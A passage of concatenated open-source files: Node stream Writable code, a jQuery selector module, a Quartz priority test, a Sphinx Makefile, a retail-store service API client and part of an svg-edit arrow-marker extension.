}, '_writableState.buffer is deprecated. Use _writableState.getBuffer ' + 'instead.', 'DEP0003')
});
} catch (_) {}
})();
// Test _writableState for inheritance to account for Duplex streams,
// whose prototype chain only points to Readable.
var realHasInstance;
if (typeof Symbol === 'function' && Symbol.hasInstance && typeof Function.prototype[Symbol.hasInstance] === 'function') {
realHasInstance = Function.prototype[Symbol.hasInstance];
Object.defineProperty(Writable, Symbol.hasInstance, {
value: function (object) {
if (realHasInstance.call(this, object)) return true;
return object && object._writableState instanceof WritableState;
}
});
} else {
realHasInstance = function (object) {
return object instanceof this;
};
}
function Writable(options) {
Duplex = Duplex || require('./_stream_duplex');
// Writable ctor is applied to Duplexes, too.
// `realHasInstance` is necessary because using plain `instanceof`
// would return false, as no `_writableState` property is attached.
// Trying to use the custom `instanceof` for Writable here will also break the
// Node.js LazyTransform implementation, which has a non-trivial getter for
// `_writableState` that would lead to infinite recursion.
if (!realHasInstance.call(Writable, this) && !(this instanceof Duplex)) {
return new Writable(options);
}
this._writableState = new WritableState(options, this);
// legacy.
this.writable = true;
if (options) {
if (typeof options.write === 'function') this._write = options.write;
if (typeof options.writev === 'function') this._writev = options.writev;
if (typeof options.destroy === 'function') this._destroy = options.destroy;
if (typeof options.final === 'function') this._final = options.final;
}
Stream.call(this);
}
// Otherwise people can pipe Writable streams, which is just wrong.
Writable.prototype.pipe = function () {
this.emit('error', new Error('Cannot pipe, not readable'));
};
function writeAfterEnd(stream, cb) {
var er = new Error('write after end');
// TODO: defer error events consistently everywhere, not just the cb
stream.emit('error', er);
processNextTick(cb, er);
}
// Checks that a user-supplied chunk is valid, especially for the particular
// mode the stream is in. Currently this means that `null` is never accepted
// and undefined/non-string values are only allowed in object mode.
function validChunk(stream, state, chunk, cb) {
var valid = true;
var er = false;
if (chunk === null) {
er = new TypeError('May not write null values to stream');
} else if (typeof chunk !== 'string' && chunk !== undefined && !state.objectMode) {
er = new TypeError('Invalid non-string/buffer chunk');
}
if (er) {
stream.emit('error', er);
processNextTick(cb, er);
valid = false;
}
return valid;
}
Writable.prototype.write = function (chunk, encoding, cb) {
var state = this._writableState;
var ret = false;
var isBuf = _isUint8Array(chunk) && !state.objectMode;
if (isBuf && !Buffer.isBuffer(chunk)) {
chunk = _uint8ArrayToBuffer(chunk);
}
if (typeof encoding === 'function') {
cb = encoding;
encoding = null;
}
if (isBuf) encoding = 'buffer';else if (!encoding) encoding = state.defaultEncoding;
if (typeof cb !== 'function') cb = nop;
if (state.ended) writeAfterEnd(this, cb);else if (isBuf || validChunk(this, state, chunk, cb)) {
state.pendingcb++;
ret = writeOrBuffer(this, state, isBuf, chunk, encoding, cb);
}
return ret;
};
Writable.prototype.cork = function () {
var state = this._writableState;
state.corked++;
};
Writable.prototype.uncork = function () {
var state = this._writableState;
if (state.corked) {
state.corked--;
if (!state.writing && !state.corked && !state.finished && !state.bufferProcessing && state.bufferedRequest) clearBuffer(this, state);
}
};
Writable.prototype.setDefaultEncoding = function setDefaultEncoding(encoding) {
// node::ParseEncoding() requires lower case.
if (typeof encoding === 'string') encoding = encoding.toLowerCase();
if (!(['hex', 'utf8', 'utf-8', 'ascii', 'binary', 'base64', 'ucs2', 'ucs-2', 'utf16le', 'utf-16le', 'raw'].indexOf((encoding + '').toLowerCase()) > -1)) throw new TypeError('Unknown encoding: ' + encoding);
this._writableState.defaultEncoding = encoding;
return this;
};
function decodeChunk(state, chunk, encoding) {
if (!state.objectMode && state.decodeStrings !== false && typeof chunk === 'string') {
chunk = Buffer.from(chunk, encoding);
}
return chunk;
}
// if we're already writing something, then just put this
// in the queue, and wait our turn. Otherwise, call _write
// If we return false, then we need a drain event, so set that flag.
function writeOrBuffer(stream, state, isBuf, chunk, encoding, cb) {
if (!isBuf) {
var newChunk = decodeChunk(state, chunk, encoding);
if (chunk !== newChunk) {
isBuf = true;
encoding = 'buffer';
chunk = newChunk;
}
}
var len = state.objectMode ? 1 : chunk.length;
state.length += len;
var ret = state.length < state.highWaterMark;
// we must ensure that previous needDrain will not be reset to false.
if (!ret) state.needDrain = true;
if (state.writing || state.corked) {
var last = state.lastBufferedRequest;
state.lastBufferedRequest = {
chunk: chunk,
encoding: encoding,
isBuf: isBuf,
callback: cb,
next: null
};
if (last) {
last.next = state.lastBufferedRequest;
} else {
state.bufferedRequest = state.lastBufferedRequest;
}
state.bufferedRequestCount += 1;
} else {
doWrite(stream, state, false, len, chunk, encoding, cb);
}
return ret;
}
function doWrite(stream, state, writev, len, chunk, encoding, cb) {
state.writelen = len;
state.writecb = cb;
state.writing = true;
state.sync = true;
if (writev) stream._writev(chunk, state.onwrite);else stream._write(chunk, encoding, state.onwrite);
state.sync = false;
}
function onwriteError(stream, state, sync, er, cb) {
--state.pendingcb;
if (sync) {
// defer the callback if we are being called synchronously
// to avoid piling up things on the stack
processNextTick(cb, er);
// this can emit finish, and it will always happen
// after error
processNextTick(finishMaybe, stream, state);
stream._writableState.errorEmitted = true;
stream.emit('error', er);
} else {
// the caller expect this to happen before if
// it is async
cb(er);
stream._writableState.errorEmitted = true;
stream.emit('error', er);
// this can emit finish, but finish must
// always follow error
finishMaybe(stream, state);
}
}
function onwriteStateUpdate(state) {
state.writing = false;
state.writecb = null;
state.length -= state.writelen;
state.writelen = 0;
}
function onwrite(stream, er) {
var state = stream._writableState;
var sync = state.sync;
var cb = state.writecb;
onwriteStateUpdate(state);
if (er) onwriteError(stream, state, sync, er, cb);else {
// Check if we're actually ready to finish, but don't emit yet
var finished = needFinish(state);
if (!finished && !state.corked && !state.bufferProcessing && state.bufferedRequest) {
clearBuffer(stream, state);
}
if (sync) {
/*<replacement>*/
asyncWrite(afterWrite, stream, state, finished, cb);
/*</replacement>*/
} else {
afterWrite(stream, state, finished, cb);
}
}
}
function afterWrite(stream, state, finished, cb) {
if (!finished) onwriteDrain(stream, state);
state.pendingcb--;
cb();
finishMaybe(stream, state);
}
// Must force callback to be called on nextTick, so that we don't
// emit 'drain' before the write() consumer gets the 'false' return
// value, and has a chance to attach a 'drain' listener.
function onwriteDrain(stream, state) {
if (state.length === 0 && state.needDrain) {
state.needDrain = false;
stream.emit('drain');
}
}
// if there's something in the buffer waiting, then process it
function clearBuffer(stream, state) {
state.bufferProcessing = true;
var entry = state.bufferedRequest;
if (stream._writev && entry && entry.next) {
// Fast case, write everything using _writev()
var l = state.bufferedRequestCount;
var buffer = new Array(l);
var holder = state.corkedRequestsFree;
holder.entry = entry;
var count = 0;
var allBuffers = true;
while (entry) {
buffer[count] = entry;
if (!entry.isBuf) allBuffers = false;
entry = entry.next;
count += 1;
}
buffer.allBuffers = allBuffers;
doWrite(stream, state, true, state.length, buffer, '', holder.finish);
// doWrite is almost always async, defer these to save a bit of time
// as the hot path ends with doWrite
state.pendingcb++;
state.lastBufferedRequest = null;
if (holder.next) {
state.corkedRequestsFree = holder.next;
holder.next = null;
} else {
state.corkedRequestsFree = new CorkedRequest(state);
}
} else {
// Slow case, write chunks one-by-one
while (entry) {
var chunk = entry.chunk;
var encoding = entry.encoding;
var cb = entry.callback;
var len = state.objectMode ? 1 : chunk.length;
doWrite(stream, state, false, len, chunk, encoding, cb);
entry = entry.next;
// if we didn't call the onwrite immediately, then
// it means that we need to wait until it does.
// also, that means that the chunk and cb are currently
// being processed, so move the buffer counter past them.
if (state.writing) {
break;
}
}
if (entry === null) state.lastBufferedRequest = null;
}
state.bufferedRequestCount = 0;
state.bufferedRequest = entry;
state.bufferProcessing = false;
}
Writable.prototype._write = function (chunk, encoding, cb) {
cb(new Error('_write() is not implemented'));
};
Writable.prototype._writev = null;
Writable.prototype.end = function (chunk, encoding, cb) {
var state = this._writableState;
if (typeof chunk === 'function') {
cb = chunk;
chunk = null;
encoding = null;
} else if (typeof encoding === 'function') {
cb = encoding;
encoding = null;
}
if (chunk !== null && chunk !== undefined) this.write(chunk, encoding);
// .end() fully uncorks
if (state.corked) {
state.corked = 1;
this.uncork();
}
// ignore unnecessary end() calls.
if (!state.ending && !state.finished) endWritable(this, state, cb);
};
function needFinish(state) {
return state.ending && state.length === 0 && state.bufferedRequest === null && !state.finished && !state.writing;
}
function callFinal(stream, state) {
stream._final(function (err) {
state.pendingcb--;
if (err) {
stream.emit('error', err);
}
state.prefinished = true;
stream.emit('prefinish');
finishMaybe(stream, state);
});
}
function prefinish(stream, state) {
if (!state.prefinished && !state.finalCalled) {
if (typeof stream._final === 'function') {
state.pendingcb++;
state.finalCalled = true;
processNextTick(callFinal, stream, state);
} else {
state.prefinished = true;
stream.emit('prefinish');
}
}
}
function finishMaybe(stream, state) {
var need = needFinish(state);
if (need) {
prefinish(stream, state);
if (state.pendingcb === 0) {
state.finished = true;
stream.emit('finish');
}
}
return need;
}
function endWritable(stream, state, cb) {
state.ending = true;
finishMaybe(stream, state);
if (cb) {
if (state.finished) processNextTick(cb);else stream.once('finish', cb);
}
state.ended = true;
stream.writable = false;
}
function onCorkedFinish(corkReq, state, err) {
var entry = corkReq.entry;
corkReq.entry = null;
while (entry) {
var cb = entry.callback;
state.pendingcb--;
cb(err);
entry = entry.next;
}
if (state.corkedRequestsFree) {
state.corkedRequestsFree.next = corkReq;
} else {
state.corkedRequestsFree = corkReq;
}
}
Object.defineProperty(Writable.prototype, 'destroyed', {
get: function () {
if (this._writableState === undefined) {
return false;
}
return this._writableState.destroyed;
},
set: function (value) {
// we ignore the value if the stream
// has not been initialized yet
if (!this._writableState) {
return;
}
// backward compatibility, the user is explicitly
// managing destroyed
this._writableState.destroyed = value;
}
});
Writable.prototype.destroy = destroyImpl.destroy;
Writable.prototype._undestroy = destroyImpl.undestroy;
Writable.prototype._destroy = function (err, cb) {
this.end();
cb(err);
}; | {
"pile_set_name": "Github"
} |
define( [
"./core",
"./var/document",
"./var/documentElement",
"./var/hasOwn",
"./var/indexOf"
], function( jQuery, document, documentElement, hasOwn, indexOf ) {
"use strict";
/*
* Optional (non-Sizzle) selector module for custom builds.
*
* Note that this DOES NOT SUPPORT many documented jQuery
* features in exchange for its smaller size:
*
* Attribute not equal selector
* Positional selectors (:first; :eq(n); :odd; etc.)
* Type selectors (:input; :checkbox; :button; etc.)
* State-based selectors (:animated; :visible; :hidden; etc.)
* :has(selector)
* :not(complex selector)
* custom selectors via Sizzle extensions
* Leading combinators (e.g., $collection.find("> *"))
* Reliable functionality on XML fragments
* Requiring all parts of a selector to match elements under context
* (e.g., $div.find("div > *") now matches children of $div)
* Matching against non-elements
* Reliable sorting of disconnected nodes
* querySelectorAll bug fixes (e.g., unreliable :focus on WebKit)
*
* If any of these are unacceptable tradeoffs, either use Sizzle or
* customize this stub for the project's specific needs.
*/
var hasDuplicate, sortInput,
sortStable = jQuery.expando.split( "" ).sort( sortOrder ).join( "" ) === jQuery.expando,
matches = documentElement.matches ||
documentElement.webkitMatchesSelector ||
documentElement.mozMatchesSelector ||
documentElement.oMatchesSelector ||
documentElement.msMatchesSelector,
// CSS string/identifier serialization
// https://drafts.csswg.org/cssom/#common-serializing-idioms
rcssescape = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g,
fcssescape = function( ch, asCodePoint ) {
if ( asCodePoint ) {
// U+0000 NULL becomes U+FFFD REPLACEMENT CHARACTER
if ( ch === "\0" ) {
return "\uFFFD";
}
// Control characters and (dependent upon position) numbers get escaped as code points
return ch.slice( 0, -1 ) + "\\" + ch.charCodeAt( ch.length - 1 ).toString( 16 ) + " ";
}
// Other potentially-special ASCII characters get backslash-escaped
return "\\" + ch;
};
function sortOrder( a, b ) {
// Flag for duplicate removal
if ( a === b ) {
hasDuplicate = true;
return 0;
}
// Sort on method existence if only one input has compareDocumentPosition
var compare = !a.compareDocumentPosition - !b.compareDocumentPosition;
if ( compare ) {
return compare;
}
// Calculate position if both inputs belong to the same document
compare = ( a.ownerDocument || a ) === ( b.ownerDocument || b ) ?
a.compareDocumentPosition( b ) :
// Otherwise we know they are disconnected
1;
// Disconnected nodes
if ( compare & 1 ) {
// Choose the first element that is related to our preferred document
if ( a === document || a.ownerDocument === document &&
jQuery.contains( document, a ) ) {
return -1;
}
if ( b === document || b.ownerDocument === document &&
jQuery.contains( document, b ) ) {
return 1;
}
// Maintain original order
return sortInput ?
( indexOf.call( sortInput, a ) - indexOf.call( sortInput, b ) ) :
0;
}
return compare & 4 ? -1 : 1;
}
function uniqueSort( results ) {
var elem,
duplicates = [],
j = 0,
i = 0;
hasDuplicate = false;
sortInput = !sortStable && results.slice( 0 );
results.sort( sortOrder );
if ( hasDuplicate ) {
while ( ( elem = results[ i++ ] ) ) {
if ( elem === results[ i ] ) {
j = duplicates.push( i );
}
}
while ( j-- ) {
results.splice( duplicates[ j ], 1 );
}
}
// Clear input after sorting to release objects
// See https://github.com/jquery/sizzle/pull/225
sortInput = null;
return results;
}
function escape( sel ) {
return ( sel + "" ).replace( rcssescape, fcssescape );
}
jQuery.extend( {
uniqueSort: uniqueSort,
unique: uniqueSort,
escapeSelector: escape,
find: function( selector, context, results, seed ) {
var elem, nodeType,
i = 0;
results = results || [];
context = context || document;
// Same basic safeguard as Sizzle
if ( !selector || typeof selector !== "string" ) {
return results;
}
// Early return if context is not an element or document
if ( ( nodeType = context.nodeType ) !== 1 && nodeType !== 9 ) {
return [];
}
if ( seed ) {
while ( ( elem = seed[ i++ ] ) ) {
if ( jQuery.find.matchesSelector( elem, selector ) ) {
results.push( elem );
}
}
} else {
jQuery.merge( results, context.querySelectorAll( selector ) );
}
return results;
},
text: function( elem ) {
var node,
ret = "",
i = 0,
nodeType = elem.nodeType;
if ( !nodeType ) {
// If no nodeType, this is expected to be an array
while ( ( node = elem[ i++ ] ) ) {
// Do not traverse comment nodes
ret += jQuery.text( node );
}
} else if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) {
// Use textContent for elements
return elem.textContent;
} else if ( nodeType === 3 || nodeType === 4 ) {
return elem.nodeValue;
}
// Do not include comment or processing instruction nodes
return ret;
},
contains: function( a, b ) {
var adown = a.nodeType === 9 ? a.documentElement : a,
bup = b && b.parentNode;
return a === bup || !!( bup && bup.nodeType === 1 && adown.contains( bup ) );
},
isXMLDoc: function( elem ) {
// documentElement is verified for cases where it doesn't yet exist
// (such as loading iframes in IE - #4833)
var documentElement = elem && ( elem.ownerDocument || elem ).documentElement;
return documentElement ? documentElement.nodeName !== "HTML" : false;
},
expr: {
attrHandle: {},
match: {
bool: new RegExp( "^(?:checked|selected|async|autofocus|autoplay|controls|defer" +
"|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped)$", "i" ),
needsContext: /^[\x20\t\r\n\f]*[>+~]/
}
}
} );
jQuery.extend( jQuery.find, {
matches: function( expr, elements ) {
return jQuery.find( expr, null, null, elements );
},
matchesSelector: function( elem, expr ) {
return matches.call( elem, expr );
},
attr: function( elem, name ) {
var fn = jQuery.expr.attrHandle[ name.toLowerCase() ],
// Don't get fooled by Object.prototype properties (jQuery #13807)
value = fn && hasOwn.call( jQuery.expr.attrHandle, name.toLowerCase() ) ?
fn( elem, name, jQuery.isXMLDoc( elem ) ) :
undefined;
return value !== undefined ? value : elem.getAttribute( name );
}
} );
} );
| {
"pile_set_name": "Github"
} |
import './gulp/dev';
import './gulp/examples';
import './gulp/docs';
| {
"pile_set_name": "Github"
} |
/*
* All content copyright Terracotta, Inc., unless otherwise indicated. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.quartz;
import java.util.Calendar;
import java.util.Properties;
import java.util.concurrent.CountDownLatch;
import junit.framework.TestCase;
import org.quartz.impl.JobDetailImpl;
import org.quartz.impl.StdSchedulerFactory;
import org.quartz.impl.triggers.SimpleTriggerImpl;
import org.quartz.spi.MutableTrigger;
/**
* Test Trigger priority support.
*/
public class PriorityTest extends TestCase {
private static CountDownLatch latch;
private static StringBuffer result;
@SuppressWarnings("deprecation")
public static class TestJob implements StatefulJob {
public void execute(JobExecutionContext context)
throws JobExecutionException {
result.append(context.getTrigger().getKey().getName());
latch.countDown();
}
}
@Override
protected void setUp() throws Exception {
PriorityTest.latch = new CountDownLatch(2);
PriorityTest.result = new StringBuffer();
}
@SuppressWarnings("deprecation")
public void testSameDefaultPriority() throws Exception {
Properties config = new Properties();
config.setProperty("org.quartz.threadPool.threadCount", "1");
config.setProperty("org.quartz.threadPool.class", "org.quartz.simpl.SimpleThreadPool");
Scheduler sched = new StdSchedulerFactory(config).getScheduler();
Calendar cal = Calendar.getInstance();
cal.add(Calendar.SECOND, 1);
MutableTrigger trig1 = new SimpleTriggerImpl("T1", null, cal.getTime());
MutableTrigger trig2 = new SimpleTriggerImpl("T2", null, cal.getTime());
JobDetail jobDetail = new JobDetailImpl("JD", null, TestJob.class);
sched.scheduleJob(jobDetail, trig1);
trig2.setJobKey(new JobKey(jobDetail.getKey().getName()));
sched.scheduleJob(trig2);
sched.start();
latch.await();
assertEquals("T1T2", result.toString());
sched.shutdown();
}
@SuppressWarnings("deprecation")
public void testDifferentPriority() throws Exception {
Properties config = new Properties();
config.setProperty("org.quartz.threadPool.threadCount", "1");
config.setProperty("org.quartz.threadPool.class", "org.quartz.simpl.SimpleThreadPool");
Scheduler sched = new StdSchedulerFactory(config).getScheduler();
Calendar cal = Calendar.getInstance();
cal.add(Calendar.SECOND, 1);
MutableTrigger trig1 = new SimpleTriggerImpl("T1", null, cal.getTime());
trig1.setPriority(5);
MutableTrigger trig2 = new SimpleTriggerImpl("T2", null, cal.getTime());
trig2.setPriority(10);
JobDetail jobDetail = new JobDetailImpl("JD", null, TestJob.class);
sched.scheduleJob(jobDetail, trig1);
trig2.setJobKey(new JobKey(jobDetail.getKey().getName(), null));
sched.scheduleJob(trig2);
sched.start();
latch.await();
assertEquals("T2T1", result.toString());
sched.shutdown();
}
}
| {
"pile_set_name": "Github"
} |
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS = -n
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = _build
DIAGRAM_BUILD_DIR = _diagrams
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
.PHONY: help clean html dirhtml singlehtml pickle json htmlhelp qthelp devhelp epub latex latexpdf text man changes linkcheck doctest gettext diagrams
help:
@echo "Please use \`make <target>' where <target> is one of"
@echo " html to make standalone HTML files"
@echo " diagrams to make diagram images"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@echo " json to make JSON files"
@echo " htmlhelp to make HTML files and a HTML help project"
@echo " qthelp to make HTML files and a qthelp project"
@echo " devhelp to make HTML files and a Devhelp project"
@echo " epub to make an epub"
@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
@echo " latexpdf to make LaTeX files and run them through pdflatex"
@echo " text to make text files"
@echo " man to make manual pages"
@echo " texinfo to make Texinfo files"
@echo " info to make Texinfo files and run them through makeinfo"
@echo " gettext to make PO message catalogs"
@echo " changes to make an overview of all changed/added/deprecated items"
@echo " linkcheck to check all external links for integrity"
@echo " doctest to run all doctests embedded in the documentation (if enabled)"
clean:
rm -rf $(BUILDDIR)/*
rm -rf $(DIAGRAM_BUILD_DIR)/*
diagrams:
mkdir -p $(DIAGRAM_BUILD_DIR)
plantuml diagrams_src/*.dot
mv diagrams_src/*.png $(DIAGRAM_BUILD_DIR)/
html: diagrams
$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
dirhtml:
$(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
singlehtml:
$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
@echo
@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
pickle:
$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
@echo
@echo "Build finished; now you can process the pickle files."
json:
$(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
@echo
@echo "Build finished; now you can process the JSON files."
htmlhelp:
$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
@echo
@echo "Build finished; now you can run HTML Help Workshop with the" \
".hhp project file in $(BUILDDIR)/htmlhelp."
qthelp:
$(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
@echo
@echo "Build finished; now you can run "qcollectiongenerator" with the" \
".qhcp project file in $(BUILDDIR)/qthelp, like this:"
@echo "# qcollectiongenerator $(BUILDDIR)/qthelp/PulpDocs.qhcp"
@echo "To view the help file:"
@echo "# assistant -collectionFile $(BUILDDIR)/qthelp/PulpDocs.qhc"
devhelp:
$(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
@echo
@echo "Build finished."
@echo "To view the help file:"
@echo "# mkdir -p $$HOME/.local/share/devhelp/PulpDocs"
@echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/PulpDocs"
@echo "# devhelp"
epub:
$(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
@echo
@echo "Build finished. The epub file is in $(BUILDDIR)/epub."
latex:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo
@echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
@echo "Run \`make' in that directory to run these through (pdf)latex" \
"(use \`make latexpdf' here to do that automatically)."
latexpdf:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through pdflatex..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
text:
$(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
@echo
@echo "Build finished. The text files are in $(BUILDDIR)/text."
man:
$(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
@echo
@echo "Build finished. The manual pages are in $(BUILDDIR)/man."
texinfo:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo
@echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
@echo "Run \`make' in that directory to run these through makeinfo" \
"(use \`make info' here to do that automatically)."
info:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo "Running Texinfo files through makeinfo..."
make -C $(BUILDDIR)/texinfo info
@echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
gettext:
$(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
@echo
@echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
changes:
$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
@echo
@echo "The overview file is in $(BUILDDIR)/changes."
linkcheck:
$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
@echo
@echo "Link check complete; look for any errors in the above output " \
"or in $(BUILDDIR)/linkcheck/output.txt."
doctest:
$(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
@echo "Testing of doctests in the sources finished, look at the " \
"results in $(BUILDDIR)/doctest/output.txt."
| {
"pile_set_name": "Github"
} |
import { get,put,postForm,PREFIX,joinParameters,joinPostParameters } from '../../axios/tools'
const view = (targetObjectId) => {
return get({
url: `${PREFIX}retailStoreFranchisingManager/view/${targetObjectId}/`,
})
}
const load = (targetObjectId, parameters) => {
const parametersExpr = joinParameters(parameters)
return get({
url: `${PREFIX}retailStoreFranchisingManager/loadRetailStoreFranchising/${targetObjectId}/${parametersExpr}/`,
})
}
const queryCandidates = ({scenarioCode,ownerType,ownerId,listType,groupBy,filterKey,targetType}) => {
const url = `${PREFIX}retailStoreFranchisingManager/queryCandidates/`
const data = JSON.stringify({scenarioCode,ownerType,ownerId,listType,groupBy,targetType,filterKey})
console.log("requestParameters",data)
return put({url,data})
}
const addRetailStore = (targetObjectId, parameters) => {
const url = `${PREFIX}retailStoreFranchisingManager/addRetailStore/retailStoreFranchisingId/name/telephone/owner/retailStoreCountryCenterId/cityServiceCenterId/creationId/investmentInvitationId/decorationId/openingId/closingId/founded/latitude/longitude/description/tokensExpr/`
const retailStoreFranchisingId = targetObjectId
const requestParameters = { ...parameters, retailStoreFranchisingId, tokensExpr: 'none' }
return postForm({ url,requestParameters})
}
const updateRetailStore = (targetObjectId, parameters) => {
const url = `${PREFIX}retailStoreFranchisingManager/updateRetailStoreProperties/retailStoreFranchisingId/id/name/telephone/owner/founded/latitude/longitude/description/tokensExpr/`
const retailStoreFranchisingId = targetObjectId
const requestParameters = { ...parameters, retailStoreFranchisingId, tokensExpr: 'none' }
return postForm({ url,requestParameters})
}
const removeRetailStoreList = (targetObjectId, parameters) => {
const url = `${PREFIX}retailStoreFranchisingManager/removeRetailStoreList/retailStoreFranchisingId/retailStoreIds/tokensExpr/`
const requestParameters = { ...parameters, retailStoreFranchisingId: targetObjectId, tokensExpr: 'none' }
return postForm({ url,requestParameters})
}
// Filter this out when no functions
const listFunctions = () => {
return get({
url: `${PREFIX}retailStoreFranchisingService/listFunctions/`,
})
}
const saveRequest = (data) => {
return put({
url: `${PREFIX}retailStoreFranchisingService/save/`,
data,
})
}
const processRequest = (data) => {
return put({
url: `${PREFIX}retailStoreFranchisingService/process/`,
data,
})
}
const RetailStoreFranchisingService = { view,
load,
addRetailStore,
updateRetailStore,
removeRetailStoreList, listFunctions, saveRequest, processRequest, queryCandidates}
export default RetailStoreFranchisingService
| {
"pile_set_name": "Github"
} |
/*
* ext-arrows.js
*
* Licensed under the Apache License, Version 2
*
* Copyright(c) 2010 Alexis Deveria
*
*/
svgEditor.addExtension("Arrows", function(S) {
var svgcontent = S.svgcontent,
addElem = S.addSvgElementFromJson,
nonce = S.nonce,
randomize_ids = S.randomize_ids,
selElems;
svgCanvas.bind('setnonce', setArrowNonce);
svgCanvas.bind('unsetnonce', unsetArrowNonce);
var lang_list = {
"en":[
{"id": "arrow_none", "textContent": "No arrow" }
],
"fr":[
{"id": "arrow_none", "textContent": "Sans flèche" }
]
};
var prefix = 'se_arrow_';
if (randomize_ids) {
var arrowprefix = prefix + nonce + '_';
} else {
var arrowprefix = prefix;
}
var pathdata = {
fw: {d:"m0,0l10,5l-10,5l5,-5l-5,-5z", refx:8, id: arrowprefix + 'fw'},
bk: {d:"m10,0l-10,5l10,5l-5,-5l5,-5z", refx:2, id: arrowprefix + 'bk'}
}
function setArrowNonce(window, n) {
randomize_ids = true;
arrowprefix = prefix + n + '_';
pathdata.fw.id = arrowprefix + 'fw';
pathdata.bk.id = arrowprefix + 'bk';
}
function unsetArrowNonce(window) {
randomize_ids = false;
arrowprefix = prefix;
pathdata.fw.id = arrowprefix + 'fw';
pathdata.bk.id = arrowprefix + 'bk';
}
function getLinked(elem, attr) {
var str = elem.getAttribute(attr);
if(!str) return null;
var m = str.match(/\(\#(.*)\)/);
if(!m || m.length !== 2) {
return null;
}
return S.getElem(m[1]);
}
function showPanel(on) {
$('#arrow_panel').toggle(on);
if(on) {
var el = selElems[0];
var end = el.getAttribute("marker-end");
var start = el.getAttribute("marker-start");
var mid = el.getAttribute("marker-mid");
var val;
if(end && start) {
val = "both";
} else if(end) {
val = "end";
} else if(start) {
val = "start";
} else if(mid) {
val = "mid";
if(mid.indexOf("bk") != -1) {
val = "mid_bk";
}
}
if(!start && !mid && !end) {
val = "none";
}
$("#arrow_list").val(val);
}
}
function resetMarker() {
var el = selElems[0];
el.removeAttribute("marker-start");
el.removeAttribute("marker-mid");
el.removeAttribute("marker-end");
}
function addMarker(dir, type, id) {
// TODO: Make marker (or use?) per arrow type, since refX can be different
id = id || arrowprefix + dir;
var marker = S.getElem(id);
var data = pathdata[dir];
if(type == "mid") {
data.refx = 5;
}
if(!marker) {
marker = addElem({
"element": "marker",
"attr": {
"viewBox": "0 0 10 10",
"id": id,
"refY": 5,
"markerUnits": "strokeWidth",
"markerWidth": 5,
"markerHeight": 5,
"orient": "auto",
"style": "pointer-events:none" // Currently needed for Opera
}
});
var arrow = addElem({
"element": "path",
"attr": {
"d": data.d,
"fill": "#000000"
}
});
marker.appendChild(arrow);
S.findDefs().appendChild(marker);
}
marker.setAttribute('refX', data.refx);
return marker;
}
function setArrow() {
var type = this.value;
resetMarker();
if(type == "none") {
return;
}
// Set marker on element
var dir = "fw";
if(type == "mid_bk") {
type = "mid";
dir = "bk";
} else if(type == "both") {
addMarker("bk", type);
svgCanvas.changeSelectedAttribute("marker-start", "url(#" + pathdata.bk.id + ")");
type = "end";
dir = "fw";
} else if (type == "start") {
dir = "bk";
}
addMarker(dir, type);
svgCanvas.changeSelectedAttribute("marker-"+type, "url(#" + pathdata[dir].id + ")");
S.call("changed", selElems);
}
function colorChanged(elem) {
var color = elem.getAttribute('stroke');
var mtypes = ['start','mid','end'];
